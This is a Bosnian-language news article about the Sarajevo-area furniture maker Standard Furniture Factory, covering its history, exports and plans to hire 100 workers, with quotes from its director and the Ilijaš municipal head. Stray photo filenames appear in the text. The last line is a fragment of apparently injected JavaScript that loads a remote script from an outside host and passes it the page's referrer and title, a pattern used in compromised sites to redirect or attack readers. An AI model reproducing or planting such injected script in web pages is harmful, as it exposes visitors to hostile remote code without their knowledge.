Firma “STANDARD FURNITURE FACTORY” planira proširiti proizvodnju i zaposliti 100 novih radnika

standarddddFirma „Standard“ osnovan je 1965. godine. Društvo je do početka rata 1992.-1995. godine imalo dugogodišnju tradiciju proizvodnje pločastog i tapaciranog namještaja .Tada prodaje namještaj na prostoru bivše Jugoslavije i izvozi u SAD te posluje u sklopu Šipad grupacije. Tokom ratnih dejstava u Sarajevu, fabrika biva devastirana i trpi velika oštećenja. Nakon rata obnavlja se u saradnji sa Ujedinjenim nacijama. 1996. godine vlasnik postaje Vlada BiH. 2001. Godine „Standard“ je privatizovan. Standard d.d. posluje u sklopu Shieder Moebel Holding GmbH –nekada najvećeg evropskog proizvođača namještaja.

Trondheim rechteckig_eiche natur_Goja Kaiman curry,cherry,schlamm,fango,green,blau„Standard Furniture Factory“ koji posluje u današnjem obliku nastaje podjelom matične firme „Standard“ d.d. 2011. na dvije firme . Nakon privatizacije usmjerava se na proizvodnju trepezarijskog namještaja. Djelatnost ove uspješne firme jeste proizvodnja trepezarisjkog namještaja od punog drveta , visoke kvalitete. Proizvodnja je opremljena savremenim mašinama za proizvodnju visoko kvalitetnog namještaja , modernog dizajna, pažljivo odabranog materijala, vrhunskog kvaliteta i savremenog standarda.

Dugogodišnje poslovanje zasniva se na sljedećim vrijednostima: kvalitet proizvoda uz kontinuiranu saradnju sa postojećim kupcima, stalna angažiranost na pronalaženju novih kupaca i tržišnih prilika, praćenje tržišnih uslova i zahtjeva te prilagođavanjem istim kroz fleksibilnost cijele organizacije, obrazovan, stručan i motiviran kadar.

DSCF3823Damir Muhić, generalni direktor firme „Standard Furnitur Factory“ kazao je da BiH jedna od najboljih podneblja za investicije, sa najnižom poreskom stopom, sa najobrazovanijim kadrom i sa najstabilnijom valutom.

„Ono što nam nedostaje jeste pravna sigurnost u državi. Treba prilagoditi sistem rada evropskim zemljama tako što ćemo urediti „Zakon o šumama“ i obrazovni sistem. Planiramo proširiti svoju djelatnost i zaposliti još 100 radnika. Trenutno zapošljavamo 750 radnika u Ilijašu a ukupno imamo 1000 uposlenika u grupaciji. Proizvodnja “Standarda” nalaze se još i u Leskovcu (Srbija) u Njemačkoj i u Sarajevu. Prednost Ilijaša je odlična saradnja sa općinskim Načelnikom Akifom Fazlićem i administracijom“ kazao je direktor Muhić.

 Načelnik Akif Fazlić, istakao je da želi upoznati se sa problemima sa kojima se susreću ove firme a također i pronalsku načina za poboljšanje ambijenta za privlačenje novih investitora.

DSCF3836„Vrlo nam je važno mišljenje menadžmenata ovih firmi jer one zapošljavaju najviše radnika u našoj Općini. Imaju izgrađen menadžment, izvozno su orjentisani i stavovi ovih ljudi trebaju da se pretoče u naše aktivnosti. Uz ocjene da smo na jednom zavidnom nivou uvijek ima prostora da se to još poboljša. Osnovali smo i Privredno vijeće kako bismo išli na preporuke za veće nivoe vlasti kako bismo rješavali nedostatke u ovim oblastima. Ubrzanje procesa, brži način do dozvola, skraćivanje rokova omogućit će brži i jeftiniji način rada i investiranja“ kazao je načelnik Fazlić.

DSCF3843U proizvodnom programu nalazi se preko 6 000 različitih artikala. Najveće tržište je tržište Njemačke sa oko 87% koja je najveći uvoznik namještaja u Evropi. Tendencija širenja ka tržištu Rusije, Švicarske, Holandije, , Francuske, Slovenije i Hrvatske.  Osim ovih tržišta strateški ciljevi su izlazak na tržište SAD-a, Rusije, Turske.   Standard Furniture Factory “ prodaje u 1100 prodajnih mjesta u Evropi .   “Standard “ posjeduje outlet salon u Podlugovima gdje se prodaje roba iz povrata.  Firma se iz godine u godinu razvija i širi, kako u kapacitetima tako i u proizvodnom asortimanu.

} else {s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;